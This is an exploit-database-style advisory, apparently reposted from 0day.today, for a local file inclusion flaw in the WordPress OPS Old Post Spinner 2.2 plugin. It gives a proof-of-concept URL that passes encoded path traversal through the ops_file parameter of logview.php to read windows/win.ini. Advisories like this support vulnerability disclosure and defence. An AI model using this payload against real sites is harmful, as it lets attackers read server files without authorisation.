id: 15510
date: 02/27/2011
title: Wordpress OPS Old Post Spinner 2.2.1 Plugin LFI Vulnerability
author: AutoSec Tools
cves: 

------------------------------------------------------------------------
Software................WordPress OPS Old Post Spinner 2.2
Vulnerability...........Local File Inclusion
Download................http://1manfactory.com/ops
Release Date............2/25/2011
Tested On...............Windows 7 + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------
 
--Description--
 
A local file inclusion vulnerability in WordPress OPS Old Post Spinner
2.2 can be exploited to include arbitrary files.
 
 
--PoC--
http://localhost/wordpress/wp-content/plugins/old-post-spinner/logview.php?ops_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini



#  0day.today [2023-03-23]  #